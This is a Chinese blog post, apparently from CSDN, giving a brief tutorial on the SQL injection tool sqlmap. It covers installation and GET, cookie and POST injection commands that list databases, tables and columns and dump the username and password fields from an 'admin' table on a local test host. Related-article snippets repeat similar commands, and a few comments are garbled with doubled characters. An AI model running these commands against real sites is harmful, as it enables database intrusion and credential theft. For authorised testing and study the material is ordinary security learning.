sqlmap的简单使用

最新推荐文章于 2022-04-01 15:09:59 发布
最新推荐文章于 2022-04-01 15:09:59 发布
阅读量153 收藏
点赞数
分类专栏: python sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42350229/article/details/104084722
版权

文章目录

sqlmap

sqlmap强大的注入工具, 跨平台, 使用python编写, 可以自定义tamper脚本

安装

linux下
sudo apt-get install sqlmap # 前提是已经有python的环境变量

运行sqlmap

sqlmap -u url # 直接sqlmap就可以
或者python sqlmap -u 也可以
win

先配置好python2的环境变量, 再从官网上下载sqlmap的源码包, 将sqlmap文件夹放在python的安装路径之下. 尝试

python sqlmap.py -u # 看看是否可以正常运行

运行sqlmap

必须加python才可以

三种注入判断方式

基本get注入及返回目标基本信息
python sqlmap.py -u "url"

获取数据库内数据:

python sqlmap.py -u url --dbs # --current-dbs 当前数据库
python sqlmap.py -u url -D 数据库名 --tables # 指定数据库内的表信息
python sqlmap.py -u url -D 数据库名 -T 表名 --columns # 数据库内表内的信息
python sqlmap.py -u url -D 数据库名 -T 表名 -C 指定的字段名 --dump 获取指定的字段内容
cookie注入
python sqlmap.py -u "url" --cookie "id=xx" --level 2

简单使用:

python sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 --dbs//判判断断是是否否存存在在cookie注入
python sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 -D xx --tables //猜解表名
python sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 -D xx -T admin --columns//猜解admin表表名名下下的的列列名名
python sqlmap.py -u http://127.0.0.1:81/1/1/shownews.asp --cookie "id=27" --level 2 --dump -C"username,password" -T admin -D xxx //获获取取指指定定列列名名admin下的数据
post注入
python sqlmap.py -u "url" --data "xx=xx&xx=xx"

基本使用同上

个人网站
简书

Pito
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlmap mysql 登录_SqlMap简单使用
weixin_35456031的博客
01-30 800
SqlMap简单使用有时候我们得到的 网站后台的登录密码 = 网站服务器的远程桌面服务登录密码 = FTP服务登录密码 (有几率)sql注入 mysql可使用综合性扫描软件扫描,在配合手工检测确认注入点,得到注入点后用sqlmap参数选其讲解参数:-rsqlmap可以从一个文本文件中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等)。比如文本文件内如下:PO...
SQLmap简单使用
11-03
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源自动化工具,目前支持的数据库是MySQL、Oracle、PostgreSQL、SQL Server、Access、DB2、SQLite、Sybase等。没有图形化界面,通过...下面简单介绍一下sqlmap使用
sqlmap使用
东方
09-11 95
https://blog.csdn.net/weixin_43571641/article/details/84146444
SQLMAP使用
weixin_34380781的博客
08-27 105
1.sqlmap -uhttp://www.1234.net/product.asp?sid=53 获取基本信息,对注入点进行初步的判断和检测 已经判断出目标的系统和数据库类型。 2.sqlmap -uhttp://www.1234.net/product.asp?sid=53...
Kali工具库之sqlmap
辰鬼的博客
05-17 3821
自动SQL注入工具。 原文: SYNOPSIS python3 sqlmap [options] 意译: 选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序的版本号并退出 -v VERBOSE 详细程度:0-6(默认为1) 目标: 必须提供这些选项中的至少一个来定义目标 -u URL, --url=URL 目标网址(例如“ http://www.s
sqlmap简单使用
qq_44704184的博客
04-01 2898
以sqllabs靶场第二关为例 1、手工注入找注入点,发现参数id,上sqlmap 2、查询数据库 python sqlmap.py -u"http://localhost/sqli-labs-master/Less-2/index.php?id=1" --dbs 3、查询security数据库 python sqlmap.py -u"http://localhost/sqli-labs-master/Less-2/index.php?id=1" --tables -D security 4、查询u
SQLMap简单使用
Amire0x的小乐园
05-06 146
SQLMap 自动检测和利用SQL注入漏洞 环境python2.7左右 命令区分大小写 特点 支持MySQL,Oracle,PostgreSQL,Microsoft SQL Sever,Microsoft Access,IBMDB2,SQLite,Firebird,Sybase,SAPMaxDB. 注入类型:盲注,UNION注入,显错式注入,时间盲注,盲推理注入和堆查询注入等 支持枚举用户,...
Sqlmap 简单使用
qq_31561731的博客
01-02 1292
使用工具探测出注入点后使用sqlmap注入的简单流程(傻瓜式跟着复制就可以使用): 1.sqlmap -u url --random-agent(这个探测出数据库类型) 2.sqlmap -u url --random-agent --current-db(这个探测出数据库的字 ) 3.sqlmap -u url --random-agent -D 数据库 -tables(枚举出数据库中的表) 4.sqlmap -u url --random-agent -D 数据库 -T 表 --colum
SQLMAP简易使用教程
nzw1134864657的博客
10-07 9179
SQLMap 一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL 注入漏洞,内置了很多绕过插件 1.1 SQLMap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆查询注入,可以同
SQLmap简单使用
一个普普通通的博客
03-02 1000
sqlmap基本使用
SQLMAP简单使用
liuno0的博客
08-31 169
SQLMAP简单使用 SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Acess,IBM DB2,SQLLite,Firebird,Sybase和SAP MaxDB……SQLmap采用几种独特的SQL注...
sqlmap使用说明.pptx
04-02
介绍了 渗透测试工具 sqlmap使用方法。 对sqlmap -tamper 脚本的使用进行了演示。 burpsuite中sqlmap的插件进行了简单的介绍。
SQLmap使用指令详解
06-12
下面是一个简单SQLmap命令示例: ```bash sqlmap -u "http://example.com/index.php?id=1" --dbs ``` 该命令将测试`http://example.com/index.php?id=1`中的参数`id`是否存在SQL注入漏洞,并尝试列出所有数据库...
SQLmap使用手册1
08-03
在Ubuntu系统中,你可以通过终端使用`pip`来安装SQLmap。首先确保你的系统已经安装了Python和pip,然后执行以下命令: ```bash sudo apt-get update sudo apt-get install python3-pip pip3 install sqlmap ``` 这将...
SQLMAP使用实战测试
06-12
### SQLMap使用实战测试知识点详解 #### 一、SQLMap简介 SQLMap是一款开源的渗透测试工具,专门用于检测和利用Web应用程序中的SQL注入漏洞。它可以帮助安全研究人员和渗透测试人员自动化地发现并利用这些漏洞,进而...
python实现crc32爆破,得到加密文件内容
weixin_42350229的博客
01-22 5374
crc32爆破 基本原理 crc检验原理实际上就是一个p位二进制序列之后附加一个r位二进制检验码(序列), 从而构成一个总长为n=p+r位的二进制序列, 附加在数据序列之后的这个检验码与数据序列的内容之间存在这某种特定的关系. 如果干扰因素使数据序列中的某一位或者某些位发生变化,这种特定的关系就会被破坏, 因此通过这种特性可以利用来爆破文件的内容. 文件的内容只有相同的时候他的crc校验才会一样....
通过python实现字频统计
weixin_42350229的博客
02-27 3773
字频统计 如果碰见了这类题目, 妥妥的字频统计.一种是直接百度找相关的字频统计网站, 一种是自己动手写脚本练练自己的编程能力. 此处有一大串英文, 统计每个词出现的频率. hello python, i am a baby, i want to a hacker. 一般的脚本写法: #!/usr/bin/python3 # -*- coding=utf8 -*- """ # @Author :...
python爆破账号密码
weixin_42350229的博客
01-21 2283
账号密码爆破 大致流程 程序开始执行程序各项参数说明requests编写一个扫描模块对读取到的密码分配给指定的线程 注意向上取整读取name,调用多线程模块实现多线程程序结束 根据程序需要选用optparse来实现程序对于参数的接受和程序–help功能的实现, math模块实现多线程的时候程序向上取整, 使password全部被分配到线程里面, 调用requests实现post和get类型的请求,...
python实现网站目录扫描
weixin_42350229的博客
01-20 1170
python实现网站目录扫描 大致流程确定如下: Created with Raphaël 2.2.0程序开始打印banner信息打印使用方法接收传递过来的参数判断参数是否接收完整(是或否?)打印错误信息直接退出程序没有接收完整yesno 根据流程图确定使用getopt,sys模块来接受参数,并进行处理, threading模块来处理多线程, requests模块来执行扫描功能, math线程的向...
sqlmap使用教程
最新发布
09-13
关于sqlmap使用教程,以下是一些基本的指导步骤: ...这只是一个简单的入门指南,sqlmap还有很多其他高级功能和选项。请记住,在进行任何安全测试之前,确保你已经获得相关授权,并且在合法和道德的框架内进行测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值